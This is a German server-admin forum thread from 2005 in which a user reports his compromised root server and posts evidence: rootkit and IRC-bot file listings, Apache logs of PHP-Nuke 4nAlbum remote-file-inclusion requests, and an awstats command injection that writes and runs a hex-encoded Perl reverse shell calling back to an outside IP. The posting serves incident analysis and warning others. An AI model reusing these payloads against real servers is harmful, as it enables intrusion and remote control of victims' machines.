mal wieder ein hack

Rund um die Sicherheit des Systems und die Applikationen
r00ty
Posts: 747
Joined: 2003-03-17 15:32

mal wieder ein hack

Post by r00ty » 2005-02-08 11:54

Hallo !
So heute hatts wohl mich erwischt. Ich hab anscheinenend nen DOS gefahren.
Leider bisher gar nichts in den Logs zu finden.
Was mich irretiert ist die Tatsache dass sowohl im mrtg als auch im srvreport der Traffic nicht auftaucht.
Wie kann das sein ?
Mrtg greift über snmp auf den Traffic zu, oder ? Da habe ich kein Plan.
Und Srvreport geht über /proc/net/dev
- das kann man aber nicht manipulieren ausser man hat den Kernel gepatcht, oder ?

andreask2
Posts: 696
Joined: 2004-01-27 14:16
Location: Aachen

Re: mal wieder ein hack

Post by andreask2 » 2005-02-08 12:19

wo siehst Du denn den Traffic?

r00ty
Posts: 747
Joined: 2003-03-17 15:32

Re: mal wieder ein hack

Post by r00ty » 2005-02-08 12:41

1und1 hat meinen Server gesperrt und mir die Tageszusammenfassung von gestern geschickt...
ansonsten seh ich es nirgends....

thomas80
Posts: 20
Joined: 2004-05-23 14:12

Re: mal wieder ein hack

Post by thomas80 » 2005-02-08 12:50

r00ty wrote:Hallo !
So heute hatts wohl mich erwischt. Ich hab anscheinenend nen DOS gefahren.
Leider bisher gar nichts in den Logs zu finden.
Was mich irretiert ist die Tatsache dass sowohl im mrtg als auch im srvreport der Traffic nicht auftaucht.
Wie kann das sein ?
Mrtg greift über snmp auf den Traffic zu, oder ? Da habe ich kein Plan.
Und Srvreport geht über /proc/net/dev
- das kann man aber nicht manipulieren ausser man hat den Kernel gepatcht, oder ?
Du musst auch nicht /proc/net/dev manipulieren, sondern nur das SRV-Script.

r00ty
Posts: 747
Joined: 2003-03-17 15:32

Re: mal wieder ein hack

Post by r00ty » 2005-02-08 13:33

hmmm ja, aber das halte ich für unwahrscheinlich denn das Tool ist nicht wirklich bekannt

oxygen
Posts: 2138
Joined: 2002-12-15 00:10
Location: Bergheim

Re: mal wieder ein hack

Post by oxygen » 2005-02-08 15:01

r00ty wrote:Hallo !
...
das kann man aber nicht manipulieren ausser man hat den Kernel gepatcht, oder ?
Kein Problem, nennt sich Rootkit.

myname
Posts: 96
Joined: 2003-10-31 11:12

Re: mal wieder ein hack

Post by myname » 2005-02-09 09:13

Lass mal ein frisches chkrootkit rüberlaufen.

mr3dblond
Posts: 15
Joined: 2003-07-04 16:36

Re: mal wieder ein hack

Post by mr3dblond » 2005-02-10 08:09

r00ty wrote:1und1 hat meinen Server gesperrt und mir die Tageszusammenfassung von gestern geschickt...
ansonsten seh ich es nirgends....
Ist das ein Root-Server? Wenn ja, woher will 1und1 wissen, ob er wirklich gehackt wurde?

Analysieren die Ihren Traffic auf DOS oder DDOS Attacken, fuer jede IP? (was ich mir nicht vorstellen kann)

Ciao Alex...

bungeebug
Posts: 187
Joined: 2004-04-14 10:08

Re: mal wieder ein hack

Post by bungeebug » 2005-02-10 12:54

Nö, aber der der geDOSt wurde könnte es ja merken ... und dann Anzeige erstatten oder freundlicherweise nur den "Gegner" kontaktiern ...

denken, dann schreiben :)

mr3dblond
Posts: 15
Joined: 2003-07-04 16:36

Re: mal wieder ein hack

Post by mr3dblond » 2005-02-10 13:06

BungeeBug wrote:Nö, aber der der geDOSt wurde könnte es ja merken ... und dann Anzeige erstatten oder freundlicherweise nur den "Gegner" kontaktiern ...

denken, dann schreiben :)
Danke!

Das bedeutet also, dass der Mieter des Rootservers den Auftrag an 1und1 gegeben hat, den Server zu sperren. Hmm, der Beitrag hatte sich halt fuer mich so angehoert, dass 1und1 den Server von sich aus gesperrt hat - und das wuerde ich als engagierter Rootserver-Admin nicht so gut finden.

Ciao Alex...

bungeebug
Posts: 187
Joined: 2004-04-14 10:08

Re: mal wieder ein hack

Post by bungeebug » 2005-02-10 21:54

Der Mieter hat nix sperren lassen ...

Es wird so gelaufen sein ...

1) Hacker hackt Rechner 1 ( den Root von Rooty )
2) Rechner 1 greift Rechner 2 an
3) Admin von Rechner 2 merkt das und sucht den Anfreifer
4) Admin von Rechner 2 findet die Ip von Rechner 1
5) Admin von Rechner 2 schriebt an 1+1, das ein rechner aus deren Netz angreift
5) 1+1 sperrt den Rechner 1.

r00ty
Posts: 747
Joined: 2003-03-17 15:32

Re: mal wieder ein hack

Post by r00ty » 2005-02-11 20:49

okay...
also hier hab ichs...
hab ein Rootkit draufgehabt - reingekommen sind sie über ein Board, dann haben sie nen rootexploit ausgeführt
ich häng noch ein paar Sachen hier an falls mal jemand die Boardsuche mit was ählichem bemüht...


/home/www/web9/html/modules/4nAlbum/album/.psy/

Code: Select all

config
config.h
cron.d
fuck
help
lang
log
motd
proc
psybnc
psybnc.conf
psybnc.pid
run
scripts
ssstt
ssstt.dir
ssstt.old
xh
y2kupdate
/var/tmp/httpd/

Code: Select all

0
clear.sh
floodbot.seen
ftp
httpd
j
k
mech.help
mech.levels
mech.pid
mech.session
mech.set
s
start.sh
v1
v2
x
/var/log/httpd/access.log

Code: Select all

 [08/Feb/2005:14:40:49 +0100] "GET /themes/Abild/images/bottombar.gif HTTP/1.0" 200 949 "http://mysub.mydomain.tld/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
202.133.81.3 - - [08/Feb/2005:14:40:50 +0100] "GET /images/powered/nuke.gif HTTP/1.0" 200 1257 "http://mysub.mydomain.tld/" "Mozilla/4.0 (compatible; MSIE6.0; Windows 98)"
202.133.81.3 - - [08/Feb/2005:14:41:41 +0100] "GET /modules/4nalbum//public/displayCategory.php?basepath=http://www.spgym.net/gallery/img/Trophee/x.txt?&cmd=ls%20-alF%20/tmp HTTP/1.0" 301 356 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
202.133.81.3 - - [08/Feb/2005:14:41:43 +0100] "GET /modules/4nAlbum//public/displayCategory.php?basepath=http://www.spgym.net/gallery/img/Trophee/x.txt?&cmd=ls%20-alF%20/tmp HTTP/1.0" 200 834 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
202.133.81.3 - - [08/Feb/2005:14:42:34 +0100] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://www.spgym.net/gallery/img/Trophee/x.txt?&cmd=ls%20-alF%20/tmp HTTP/1.0" 200 834 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
202.133.81.3 - - [08/Feb/2005:14:43:14 +0100] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://www.nrjreunion.com/galerie/img/1/1.txt? HTTP/1.0" 200 834 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
202.133.81.3 - - [08/Feb/2005:14:43:50 +0100] "GET /modules.php?name=4nAlbum HTTP/1.0" 200 12144 "http://mysub.mydomain.tld/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
202.133.81.3 - - [08/Feb/2005:14:43:54 +0100] "GET /modules/4nAlbum/images/logodeu.gif HTTP/1.0" 200 9732 "http://mysub.mydomain.tld/modules.php?name=4nAlbum" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
202.133.81.3 - - [08/Feb/2005:14:43:54 +0100] "GET /modules/4nAlbum/images/menu-icon-home.gif HTTP/1.0" 200 1189 "http://mysub.mydomain.tld/modules.php?name=4nAlbum" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
202.133.81.3 - - [08/Feb/2005:14:43:54 +0100] "GET /modules/4nAlbum/images/menu-icon-top10.gif HTTP/1.0" 200 1244 "http://mysub.mydomain.tld/modules.php?name=4nAlbum" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
202.133.81.3 - - [08/Feb/2005:14:43:55 +0100] "GET /modules/4nAlbum/images/menu-icon-submit.gif HTTP/1.0" 200 1294 "http://mysub.mydomain.tld/modules.php?name=4nAlbum" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
202.133.81.3 - - [08/Feb/2005:14:43:58 +0100] "GET /modules/4nAlbum/album/kurse/gallery.gif HTTP/1.0" 200 439 "http://mysub.mydomain.tld/modules.php?name=4nAlbum" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
202.133.81.3 - - [08/Feb/2005:14:43:58 +0100] "GET /modules/4nAlbum/album/schueler/gallery.gif HTTP/1.0" 200 439 "http://mysub.mydomain.tld/modules.php?name=4nAlbum" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
202.133.81.3 - - [08/Feb/2005:14:43:58 +0100] "GET /modules/4nAlbum/images/newred.gif HTTP/1.0" 200 403 "http://mysub.mydomain.tld/modules.php?name=4nAlbum" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
202.133.81.3 - - [08/Feb/2005:14:44:00 +0100] "GET /modules/4nAlbum/album/sonstige/gallery.gif HTTP/1.0" 200 439 "http://mysub.mydomain.tld/modules.php?name=4nAlbum" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
202.133.81.3 - - [08/Feb/2005:14:44:49 +0100] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://www.spgym.net/gallery/img/Trophee/x.txt?&cmd=id HTTP/1.0" 200 834 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
202.133.81.3 - - [09/Feb/2005:18:00:01 +0100] "GET /modules/4nalbum/public/displayCategory.php?basepath=http://www.spgym.net/gallery/img/Trophee/x.txt?&cmd=id HTTP/1.0" 301 341 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
202.133.81.3 - - [09/Feb/2005:18:00:03 +0100] "GET /modules/4nAlbum/public/displayCategory.php?basepath=http://www.spgym.net/gallery/img/Trophee/x.txt?&cmd=id HTTP/1.0" 200 834 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
202.133.81.3 - - [09/Feb/2005:18:05:08 +0100] "GET /modules/4nalbum/public/displayCategory.php?basepath=http://www.spgym.net/gallery/img/Trophee/x.txt?&cmd=id HTTP/1.0" 301 341 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
202.133.81.3 - - [09/Feb/2005:18:05:23 +0100] "GET / HTTP/1.0" 200 19996 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
202.133.81.3 - - [09/Feb/2005:18:05:55 +0100] "GET /modules.php?name=ppm HTTP/1.0" 200 9463 "http://mysub.mydomain.tld/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
202.133.81.3 - - [09/Feb/2005:18:06:11 +0100] "GET /modules.php?name=4ncalendar HTTP/1.0" 200 9463 "http://mysub.mydomain.tld/modules.php?name=ppm" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
tcpdump der Pakete die ich dann Tonnenweise verschickt habe

Code: Select all

16:31:36.422224 217.160.172.64.34016 > 84.202.51.15.http: udp 15 (DF)

r00ty
Posts: 747
Joined: 2003-03-17 15:32

Re: mal wieder ein hack

Post by r00ty » 2005-02-11 20:53

ein netstat von mir sagt:

Code: Select all

udp        0      0 localhost.l:filenet-nch localhost.l:filenet-nch ESTABLISHED postgres   38818
sollte mir das sorgen machen ?

yt
Posts: 103
Joined: 2003-10-13 23:04
Location: Duisburg

Re: mal wieder ein hack

Post by yt » 2005-02-11 20:58

Was für ein Board?

Anonymous

Re: mal wieder ein hack

Post by Anonymous » 2005-02-11 22:37

Hallo,
was wohl?
202.133.81.3 - - [08/Feb/2005:14:40:50 +0100] "GET /images/powered/nuke.gif
... PHPNuke mit 4nAlbum - latürnich, was sonst? :roll:
gruss
rootshell

hazze
Posts: 46
Joined: 2003-06-04 08:03
Location: Bern (Schweiz)

Re: mal wieder ein hack

Post by hazze » 2005-02-12 07:14

Scheint wohl generell ein Porblem zu sein

Mich hats auch erwischt jedoch hab ich kein Nuke drauf

Habe ausserdem erfahren das es via PHP und Apache solche eingriffe per Rootkit geben kann

andreask2
Posts: 696
Joined: 2004-01-27 14:16
Location: Aachen

Re: mal wieder ein hack

Post by andreask2 » 2005-02-12 08:43

was für "solche Eingriffe"?

dodolin
Posts: 3840
Joined: 2003-01-21 01:59
Location: Sinsheim/Karlsruhe

Re: mal wieder ein hack

Post by dodolin » 2005-02-12 10:50

Habe ausserdem erfahren das es via PHP und Apache solche eingriffe per Rootkit geben kann
Rootzugriff bekommt man damit im allgemeinen nur, wenn es noch einen lokalen root exploit gibt, denn weder Apache noch PHP werden gewöhnlicherweise unter UID 0 laufen.

r00ty
Posts: 747
Joined: 2003-03-17 15:32

Re: mal wieder ein hack

Post by r00ty » 2005-02-13 18:30

irgendwie haben die's auf mich abgeshen - heute waren sie über awstats.pl drinnen
mir langts jetzt wirklich....

Code: Select all

62.249.182.219 - - [13/Feb/2005:02:55:03 +0100] "GET /awstats/awstats.pl?configdir=|perl%20-e%20%22print%20%5C%22%5Cx23%5Cx21%5Cx2f%5Cx75%5Cx73%5Cx72%5Cx2f%
5Cx62%5Cx69%5Cx6e%5Cx2f%5Cx70%5Cx65%5Cx72%5Cx6c%5Cx0a%5Cx75%5Cx73%5Cx65%5Cx20%5Cx53%5Cx6f%5Cx63%5Cx6b%5Cx65%5Cx74%5Cx3b%5Cx20%5Cx75%5Cx73%5Cx65%5Cx20%5Cx49%
5Cx4f%5Cx3a%5Cx3a%5Cx48%5Cx61%5Cx6e%5Cx64%5Cx6c%5Cx65%5Cx3b%5Cx20%5Cx75%5Cx73%5Cx65%5Cx20%5Cx50%5Cx4f%5Cx53%5Cx49%5Cx58%5Cx3b%5Cx20%5Cx24%5Cx70%5Cx72%5Cx6f%
5Cx74%5Cx6f%5Cx20%5Cx3d%5Cx20%5Cx67%5Cx65%5Cx74%5Cx70%5Cx72%5Cx6f%5Cx74%5Cx6f%5Cx62%5Cx79%5Cx6e%5Cx61%5Cx6d%5Cx65%5Cx28%5Cx27%5Cx74%5Cx63%5Cx70%5Cx27%5Cx29%
5Cx3b%5C%22%22%20%3E/var/tmp/.vetx.95| HTTP/1.1" 200 729 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
62.249.182.219 - - [13/Feb/2005:02:55:05 +0100] "GET /awstats/awstats.pl?configdir=|perl%20-e%20%22print%20%5C%22%5Cx20%5Cx73%5Cx6f%5Cx63%5Cx6b%5Cx65%5Cx74%
5Cx28%5Cx53%5Cx6f%5Cx63%5Cx6b%5Cx65%5Cx74%5Cx5f%5Cx48%5Cx61%5Cx6e%5Cx64%5Cx6c%5Cx65%5Cx2c%5Cx20%5Cx41%5Cx46%5Cx5f%5Cx49%5Cx4e%5Cx45%5Cx54%5Cx2c%5Cx20%5Cx53%
5Cx4f%5Cx43%5Cx4b%5Cx5f%5Cx53%5Cx54%5Cx52%5Cx45%5Cx41%5Cx4d%5Cx2c%5Cx20%5Cx24%5Cx70%5Cx72%5Cx6f%5Cx74%5Cx6f%5Cx29%5Cx3b%5Cx20%5Cx24%5Cx73%5Cx69%5Cx6e%5Cx20%
5Cx3d%5Cx20%5Cx73%5Cx6f%5Cx63%5Cx6b%5Cx61%5Cx64%5Cx64%5Cx72%5Cx5f%5Cx69%5Cx6e%5Cx28%5Cx33%5Cx31%5Cx30%5Cx33%5Cx32%5Cx2c%5Cx69%5Cx6e%5Cx65%5Cx74%5Cx5f%5Cx61%
5Cx74%5C%22%22%20%3E%3E/var/tmp/.vetx.95| HTTP/1.1" 200 730 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
62.249.182.219 - - [13/Feb/2005:02:55:06 +0100] "GET /awstats/awstats.pl?configdir=|perl%20-e%20%22print%20%5C%22%5Cx6f%5Cx6e%5Cx28%5Cx22%5Cx36%5Cx32%5Cx2e%
5Cx32%5Cx34%5Cx39%5Cx2e%5Cx31%5Cx38%5Cx32%5Cx2e%5Cx32%5Cx31%5Cx39%5Cx22%5Cx20%5Cx29%5Cx29%5Cx3b%5Cx20%5Cx63%5Cx6f%5Cx6e%5Cx6e%5Cx65%5Cx63%5Cx74%5Cx28%5Cx53%
5Cx6f%5Cx63%5Cx6b%5Cx65%5Cx74%5Cx5f%5Cx48%5Cx61%5Cx6e%5Cx64%5Cx6c%5Cx65%5Cx2c%5Cx24%5Cx73%5Cx69%5Cx6e%5Cx29%5Cx3b%5Cx20%5Cx64%5Cx75%5Cx70%5Cx32%5Cx28%5Cx53%
5Cx6f%5Cx63%5Cx6b%5Cx65%5Cx74%5Cx5f%5Cx48%5Cx61%5Cx6e%5Cx64%5Cx6c%5Cx65%5Cx2d%5Cx3e%5Cx66%5Cx69%5Cx6c%5Cx65%5Cx6e%5Cx6f%5Cx2c%5Cx20%5Cx30%5Cx29%5Cx3b%5Cx20%
5Cx64%5C%22%22%20%3E%3E/var/tmp/.vetx.95| HTTP/1.1" 200 730 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
62.249.182.219 - - [13/Feb/2005:02:55:07 +0100] "GET /awstats/awstats.pl?configdir=|perl%20-e%20%22print%20%5C%22%5Cx75%5Cx70%5Cx32%5Cx28%5Cx53%5Cx6f%5Cx63%
5Cx6b%5Cx65%5Cx74%5Cx5f%5Cx48%5Cx61%5Cx6e%5Cx64%5Cx6c%5Cx65%5Cx2d%5Cx3e%5Cx66%5Cx69%5Cx6c%5Cx65%5Cx6e%5Cx6f%5Cx2c%5Cx20%5Cx31%5Cx29%5Cx3b%5Cx20%5Cx64%5Cx75%
5Cx70%5Cx32%5Cx28%5Cx53%5Cx6f%5Cx63%5Cx6b%5Cx65%5Cx74%5Cx5f%5Cx48%5Cx61%5Cx6e%5Cx64%5Cx6c%5Cx65%5Cx2d%5Cx3e%5Cx66%5Cx69%5Cx6c%5Cx65%5Cx6e%5Cx6f%5Cx2c%5Cx20%
5Cx32%5Cx29%5Cx3b%5Cx20%5Cx65%5Cx78%5Cx65%5Cx63%5Cx20%5Cx7b%5Cx20%5Cx22%5Cx2f%5Cx62%5Cx69%5Cx6e%5Cx2f%5Cx73%5Cx68%5Cx22%5Cx20%5Cx7d%5Cx20%5Cx22%5Cx22%5Cx3b%
5Cx0a%5C%22%22%20%3E%3E/var/tmp/.vetx.95| HTTP/1.1" 200 730 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
62.249.182.219 - - [13/Feb/2005:02:55:09 +0100] "GET /awstats/awstats.pl?configdir=|chmod%20755%20/var/tmp/.vetx.95| HTTP/1.1" 200 373 "-" "Mozilla/4.0 (com
patible; MSIE 6.0; Windows 98)"
62.249.182.219 - - [13/Feb/2005:02:55:13 +0100] "GET /awstats/awstats.pl?configdir=|rm%20%2Df%20/var/tmp/.vetx.95| HTTP/1.1" 200 369 "-" "Mozilla/4.0 (compa
tible; MSIE 6.0; Windows 98)"
62.249.182.219 - - [13/Feb/2005:02:56:51 +0100] "GET /awstats/awstats.pl?configdir=|exec%20/var/tmp/.vetx.95| HTTP/1.1" 200 368 "-" "Mozilla/4.0 (compatible
; MSIE 6.0; Windows 98)"

User avatar
Joe User
Project Manager
Project Manager
Posts: 11139
Joined: 2003-02-27 01:00
Location: Hamburg

Re: mal wieder ein hack

Post by Joe User » 2005-02-13 20:49

Kleiner Trost: phpbb.com wurde ebenfalls durch den awstats-Bug gerootet.
PayPal.Me/JoeUserFreeBSD Remote Installation
Wings for LifeWings for Life World Run

„If there’s more than one possible outcome of a job or task, and one
of those outcomes will result in disaster or an undesirable consequence,
then somebody will do it that way.“ -- Edward Aloysius Murphy Jr.

dodolin
Posts: 3840
Joined: 2003-01-21 01:59
Location: Sinsheim/Karlsruhe

Re: mal wieder ein hack

Post by dodolin » 2005-02-13 22:22

irgendwie haben die's auf mich abgeshen - heute waren sie über awstats.pl drinnen
mir langts jetzt wirklich....
Du solltest dich nicht über die Spielkinder aufregen, sondern über deine eigene Nachlässigkeit. Sowohl der AWstats Bug als auch diverse Kernel-Bugs waren ja nicht erst seit heute bekannt. Nicht immer die Schuld bei anderen suchen...

r00ty
Posts: 747
Joined: 2003-03-17 15:32

Re: mal wieder ein hack

Post by r00ty » 2005-02-14 09:04

ich liebe diese schlauen Belehrungen :)
Ich bin der Meinung dass ich meinen Job nicht schlecht gemacht habe. Immerhin ist er jetzt > 2 Jahre gerannt ohne größere Probleme zu machen. Und wenn ich daran denke was alles auf dem Server läuft überrascht es mich eigentlich selbst, dass es nicht schon früher Probleme gemacht hat.
Und zu den Kernel Bugs muss ich dich leider enttäuschen, zumindest hat ich den aktuellen 1und1-Kernel am laufen. Da hoffe ich doch mal dass dieser gepatcht war. Vermutlich haben sie über einen mc-root-expoilt das erste mal ihr rootkit installiert....
Und das mit awstats ist halt auch genial: ich hab das nach dem HowTo hier draufgezogen, und leider funktioniert es nicht wenn man die aktuelle Version statt der die im HowTo angegeben ist verwendet. Natürlich rechtfertigt es nicht, das alte awstats zu verwenden, aber es ist für die Leute genial, die einfach die IP-Range der 1und1 Server durchgehen da dort sicher der ein oder andere ist der das Howto hier verwendet hat. Die Supportleute haben auch gemeint dass sie >10 Server deswegen gestern vom Netz genommen haben.
Nunja, jetzt gibts eine neue Kiste bei der alles schneller, besser, schöner und sicherer wird :)

chris76
Moderator
Moderator
Posts: 1878
Joined: 2003-06-27 14:37
Location: Germering

Re: mal wieder ein hack

Post by chris76 » 2005-02-14 09:20

r00ty wrote:Und das mit awstats ist halt auch genial: ich hab das nach dem HowTo hier draufgezogen, und leider funktioniert es nicht wenn man die aktuelle Version statt der die im HowTo angegeben ist verwendet.
Und noch eine schlaue Belehrung:
Zu dem Zeitpunkt wo der awstats Bug bekanntgeworden ist hast du versucht es upzudaten aber festgestellt das es mit dem Howto hier nicht geht.
Was hat dich davon abgehalten hier nach hilfe zu suchen um rauszufinden warum es nicht geht das Update?

Vermutlich weil es ja "nur" die Statistik ist? Oder?
und sicherer wird Smile
vor allem das hoffe ich nicht für dich sondern für alle anderen Server Besitzer!
Gruß Christian

BofH excuses: YOU HAVE AN I/O ERROR -> Incompetent Operator error

r00ty
Posts: 747
Joined: 2003-03-17 15:32

Re: mal wieder ein hack

Post by r00ty » 2005-02-14 09:41

chris76 wrote:Vermutlich weil es ja "nur" die Statistik ist? Oder?
da liegst du wohl richtig, ich war froh das das Teil endlich gelaufen ist.....
aber wie gesagt, man lernt draus

eine Sache die mich für meinen nächsten Server noch a weng Sorgen bereitet ist dieses:
für Boards und CMS-Systeme (und andere große bekannte Projekte) wird es immer wieder Exploits geben, um zumindest User-Rechte zu erlangen und das langt ja auch schon um andere Leute mit meinem Server zu pisaken. Und dafür sehe ich bisher nicht wirklich Möglichkeiten dies zu verhindern....

User avatar
Joe User
Project Manager
Project Manager
Posts: 11139
Joined: 2003-02-27 01:00
Location: Hamburg

Re: mal wieder ein hack

Post by Joe User » 2005-02-14 10:14

r00ty wrote:Und dafür sehe ich bisher nicht wirklich Möglichkeiten dies zu verhindern....
Verhindern kann man soetwas, abgesehen vom Ausbau der NIC, nicht, aber man kann es potentiellen Crackern durchaus schwer machen. Ein paar Schlagworte wären beispielsweise: pax, grsec, rsbac, selinux, ssp, pie, acl, attr, jail, chroot, chrootuid, scp/sftp, pub-key, ssl, gpg, nodev, noexec, nosuid, ...
PayPal.Me/JoeUserFreeBSD Remote Installation
Wings for LifeWings for Life World Run

„If there’s more than one possible outcome of a job or task, and one
of those outcomes will result in disaster or an undesirable consequence,
then somebody will do it that way.“ -- Edward Aloysius Murphy Jr.